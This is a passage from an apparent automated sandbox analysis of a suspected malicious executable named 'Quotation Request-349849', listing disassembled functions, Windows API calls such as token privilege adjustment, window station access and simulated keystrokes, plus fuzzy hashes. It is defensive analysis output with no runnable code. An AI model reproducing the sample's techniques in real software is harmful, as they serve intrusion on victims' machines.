                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 2931B3B4A00109DBC718DF58C484AB9F7A6FB59300B6487A5E90ACB356D735EDC1DBE0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 4e93a2348349842645fe681bc48fa0537b4cc2923c50ea90630ec1bd2a8fb74f
                                                      • Instruction ID: 12cb9b416569c9f753e632c600974015d649269355e42285487207fc710b0d79
                                                      • Opcode Fuzzy Hash: 4e93a2348349842645fe681bc48fa0537b4cc2923c50ea90630ec1bd2a8fb74f
                                                      • Instruction Fuzzy Hash: D041F574604341DFDB24DF24C448B1ABBF1BF49318F0989ADE99A8B762C735E845CB52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 66c49cc6fea7a12b5432c8a9c0b4766653cbee5645b94185eca40a658dd628e5
                                                      • Instruction ID: 448431d25ecdc597c7078738a9e6eca76264bd2104899f2ccf28cfca94bd1dde
                                                      • Opcode Fuzzy Hash: 66c49cc6fea7a12b5432c8a9c0b4766653cbee5645b94185eca40a658dd628e5
                                                      • Instruction Fuzzy Hash: 382106B2614A09EBEB148F29EC4177A7BB4FF14350F25882FE486C52A1EB3181D0D745
                                                      APIs
                                                        • Part of subcall function 007D4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 007D4BEF
                                                        • Part of subcall function 007F525B: __wfsopen.LIBCMT ref: 007F5266
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4E0F
                                                        • Part of subcall function 007D4B6A: FreeLibrary.KERNEL32(00000000), ref: 007D4BA4
                                                        • Part of subcall function 007D4C70: _memmove.LIBCMT ref: 007D4CBA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      • Opcode ID: a4f3bfbd3af72a55746849b6536173333defeb0771672297f3e7ae0c7957b498
                                                      • Instruction ID: 9fc4a7f02e160425aae30e30c51962510ac80dc2cac208bca9f0cf2426344c77
                                                      • Opcode Fuzzy Hash: a4f3bfbd3af72a55746849b6536173333defeb0771672297f3e7ae0c7957b498
                                                      • Instruction Fuzzy Hash: 0D119431600305FBCF15AFB4CC1AF6D77B5BF44710F10882AF545A7281DA7999059751
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: f1e8f4a0fefb3b7be5ddc56707f0f0965416d73aa1331844c0bd00e2722833af
                                                      • Instruction ID: 558876bca8180884a290818353d31e5687e907359135de4a330aed179d20709c
                                                      • Opcode Fuzzy Hash: f1e8f4a0fefb3b7be5ddc56707f0f0965416d73aa1331844c0bd00e2722833af
                                                      • Instruction Fuzzy Hash: A7212274A08301DFCB14DF24C844A2ABBF1BF88314F05896CE98A87722D735E808CB92
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 007F48A6
                                                        • Part of subcall function 007F8B28: __getptd_noexit.LIBCMT ref: 007F8B28
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2597487223-0
                                                      • Opcode ID: 179d28f0e75c59782523a142346dc1aaa85df3447fcd0448daef161b59574fa6
                                                      • Instruction ID: 21016ff55a2af92c4da68b2f20b766afb2624137ef0a00fd9dad3e913ea9ad98
                                                      • Opcode Fuzzy Hash: 179d28f0e75c59782523a142346dc1aaa85df3447fcd0448daef161b59574fa6
                                                      • Instruction Fuzzy Hash: D3F02D3290064CEBEF51AFB4CC0A3BF36A0AF00360F048404F620AA381CBBC8A50DB52
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4E7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 33be9a8a66be74de857e9b8d50ba130c6efb8e5e59ea9473efeafd76b709e02c
                                                      • Instruction ID: 3ee4031154aec998dab3d3016e9641e8f189e60c754b258af396a3c3c7924c7c
                                                      • Opcode Fuzzy Hash: 33be9a8a66be74de857e9b8d50ba130c6efb8e5e59ea9473efeafd76b709e02c
                                                      • Instruction Fuzzy Hash: 19F03971501B11EFCB349F64E494822BBF1BF143293208A3FE2D682720C73A9840DF40
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007F07B0
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      • Opcode ID: 87a104672cd195426ae3a5d625981938ec6186864f72e93a9f71d6beb2b20f0a
                                                      • Instruction ID: 05c62e28cbb162be53638b890ebfaa99eddac8b6e14cf657b4bd922f6c7e48ea
                                                      • Opcode Fuzzy Hash: 87a104672cd195426ae3a5d625981938ec6186864f72e93a9f71d6beb2b20f0a
                                                      • Instruction Fuzzy Hash: 42E0867690422857C720A6689C09FEA77EDEF887A1F0441B6FD0CD7245D9649C808691
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction ID: 1154f6df7036aefbd2a944a030eb32af77ae0be763951e4404f881d1a3aa6a75
                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction Fuzzy Hash: 2FB092B644020CB7CE012A82FC02A593F19AB41764F408020FB0C18262A677A6649A89
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 015EB549
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: 86212927a8ce517abbeda3d796cde6b0ec606b295514661a235595e98f23dbb8
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: B1E0BF7494020D9FDB00DFA4D5496AD7BB4EF04302F100161FD0192290D6309A508A62
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0085CB37
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0085CB95
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0085CBD6
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0085CC00
                                                      • SendMessageW.USER32 ref: 0085CC29
                                                      • _wcsncpy.LIBCMT ref: 0085CC95
                                                      • GetKeyState.USER32(00000011), ref: 0085CCB6
                                                      • GetKeyState.USER32(00000009), ref: 0085CCC3
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0085CCD9
                                                      • GetKeyState.USER32(00000010), ref: 0085CCE3
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0085CD0C
                                                      • SendMessageW.USER32 ref: 0085CD33
                                                      • SendMessageW.USER32(?,00001030,?,0085B348), ref: 0085CE37
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0085CE4D
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0085CE60
                                                      • SetCapture.USER32(?), ref: 0085CE69
                                                      • ClientToScreen.USER32(?,?), ref: 0085CECE
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0085CEDB
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0085CEF5
                                                      • ReleaseCapture.USER32 ref: 0085CF00
                                                      • GetCursorPos.USER32(?), ref: 0085CF3A
                                                      • ScreenToClient.USER32(?,?), ref: 0085CF47
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0085CFA3
                                                      • SendMessageW.USER32 ref: 0085CFD1
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0085D00E
                                                      • SendMessageW.USER32 ref: 0085D03D
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0085D05E
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0085D06D
                                                      • GetCursorPos.USER32(?), ref: 0085D08D
                                                      • ScreenToClient.USER32(?,?), ref: 0085D09A
                                                      • GetParent.USER32(?), ref: 0085D0BA
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0085D123
                                                      • SendMessageW.USER32 ref: 0085D154
                                                      • ClientToScreen.USER32(?,?), ref: 0085D1B2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0085D1E2
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0085D20C
                                                      • SendMessageW.USER32 ref: 0085D22F
                                                      • ClientToScreen.USER32(?,?), ref: 0085D281
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0085D2B5
                                                        • Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0085D351
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3977979337-4164748364
                                                      • Opcode ID: 231ee713eac0faf73046223c4a12c7d309347cf0af424b1d157ddefb8b56d6b5
                                                      • Instruction ID: 37f7330f71d932fc2aef24ee46762a7af4fb4b1107a988832ed255f964eff13f
                                                      • Opcode Fuzzy Hash: 231ee713eac0faf73046223c4a12c7d309347cf0af424b1d157ddefb8b56d6b5
                                                      • Instruction Fuzzy Hash: F642AD74204341AFDB21DF28C848AAABBE5FF48322F140529FA95D72B1D731D859DF52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_memset
                                                      • String ID: 3c~$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_~
                                                      • API String ID: 1357608183-3618157465
                                                      • Opcode ID: c7c8df7d7413c1bae553b6c8c9210319e47e7e9aec7da8459854116f7657436c
                                                      • Instruction ID: c88e12a3281e53066c39374b035d0c55c3f5153ff86c9c282e76b8a8a132bc68
                                                      • Opcode Fuzzy Hash: c7c8df7d7413c1bae553b6c8c9210319e47e7e9aec7da8459854116f7657436c
                                                      • Instruction Fuzzy Hash: 4F93B275A00229DFDB28CF58D891BADB7B1FF48310F25816AE945EB281E7749EC1CB50
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,?), ref: 007D48DF
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0080D665
                                                      • IsIconic.USER32(?), ref: 0080D66E
                                                      • ShowWindow.USER32(?,00000009), ref: 0080D67B
                                                      • SetForegroundWindow.USER32(?), ref: 0080D685
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0080D69B
                                                      • GetCurrentThreadId.KERNEL32 ref: 0080D6A2
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0080D6AE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0080D6BF
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0080D6C7
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0080D6CF
                                                      • SetForegroundWindow.USER32(?), ref: 0080D6D2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080D6E7
                                                      • keybd_event.USER32(00000012,00000000), ref: 0080D6F2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080D6FC
                                                      • keybd_event.USER32(00000012,00000000), ref: 0080D701
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080D70A
                                                      • keybd_event.USER32(00000012,00000000), ref: 0080D70F
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080D719
                                                      • keybd_event.USER32(00000012,00000000), ref: 0080D71E
                                                      • SetForegroundWindow.USER32(?), ref: 0080D721
                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0080D748
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: f78d54a2bd0fd69f3439e098a369be388ed46114057aa021bd242802e4668378
                                                      • Instruction ID: c137567c80b8c5c78139e24f9481e34a42f713cba0249f927efc7ad217a75f4d
                                                      • Opcode Fuzzy Hash: f78d54a2bd0fd69f3439e098a369be388ed46114057aa021bd242802e4668378
                                                      • Instruction Fuzzy Hash: 03319271A40318BBEB202BA18C4AF7F3E6CFB44B51F104025FB05EB1D2D6B45900ABA0
                                                      APIs
                                                        • Part of subcall function 008287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0082882B
                                                        • Part of subcall function 008287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828858
                                                        • Part of subcall function 008287E1: GetLastError.KERNEL32 ref: 00828865
                                                      • _memset.LIBCMT ref: 00828353
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008283A5
                                                      • CloseHandle.KERNEL32(?), ref: 008283B6
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008283CD
                                                      • GetProcessWindowStation.USER32 ref: 008283E6
                                                      • SetProcessWindowStation.USER32(00000000), ref: 008283F0
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0082840A
                                                        • Part of subcall function 008281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00828309), ref: 008281E0
                                                        • Part of subcall function 008281CB: CloseHandle.KERNEL32(?,?,00828309), ref: 008281F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 26fe6f6085d4854d53ec82c96d4be32cb11a1eb61edcb6a1fa9aba51aeeb373e
                                                      • Instruction ID: dba8c57185ae5201972c2caad1064bf6d39432ce6b7a402d88904087b871e70b
                                                      • Opcode Fuzzy Hash: 26fe6f6085d4854d53ec82c96d4be32cb11a1eb61edcb6a1fa9aba51aeeb373e
                                                      • Instruction Fuzzy Hash: C9817971902219EFDF119FA4ED49AEEBBB8FF08304F144169F910E2261DB358E94DB20
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0083C78D
                                                      • FindClose.KERNEL32(00000000), ref: 0083C7E1
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083C806
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083C81D
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0083C844
                                                      • __swprintf.LIBCMT ref: 0083C890
                                                      • __swprintf.LIBCMT ref: 0083C8D3
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • __swprintf.LIBCMT ref: 0083C927
                                                        • Part of subcall function 007F3698: __woutput_l.LIBCMT ref: 007F36F1
                                                      • __swprintf.LIBCMT ref: 0083C975
                                                        • Part of subcall function 007F3698: __flsbuf.LIBCMT ref: 007F3713
                                                        • Part of subcall function 007F3698: __flsbuf.LIBCMT ref: 007F372B
                                                      • __swprintf.LIBCMT ref: 0083C9C4
                                                      • __swprintf.LIBCMT ref: 0083CA13
                                                      • __swprintf.LIBCMT ref: 0083CA62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: 7afc2af326edb23bc02c8595e8c6930f44ca1382e9fc8255e8bcb1cc5cc68460
                                                      • Instruction ID: 7b2e4731b13cf2148f67fe347968f3452d7ea453e535658d71d9209189cfd29d
                                                      • Opcode Fuzzy Hash: 7afc2af326edb23bc02c8595e8c6930f44ca1382e9fc8255e8bcb1cc5cc68460
                                                      • Instruction Fuzzy Hash: B8A1FEB1504344EBC754EB94C889DAFB7FCFF94704F40492AF695D6251EA38EA08CB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0083EFB6
                                                      • _wcscmp.LIBCMT ref: 0083EFCB
                                                      • _wcscmp.LIBCMT ref: 0083EFE2
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0083EFF4
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0083F00E
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0083F026
                                                      • FindClose.KERNEL32(00000000), ref: 0083F031
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0083F04D
                                                      • _wcscmp.LIBCMT ref: 0083F074
                                                      • _wcscmp.LIBCMT ref: 0083F08B
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083F09D
                                                      • SetCurrentDirectoryW.KERNEL32(00888920), ref: 0083F0BB
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083F0C5
                                                      • FindClose.KERNEL32(00000000), ref: 0083F0D2
                                                      • FindClose.KERNEL32(00000000), ref: 0083F0E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: c48c346789ecf3afb5136dc2705b158aba2c5c085c920246fd8fc17c671849df
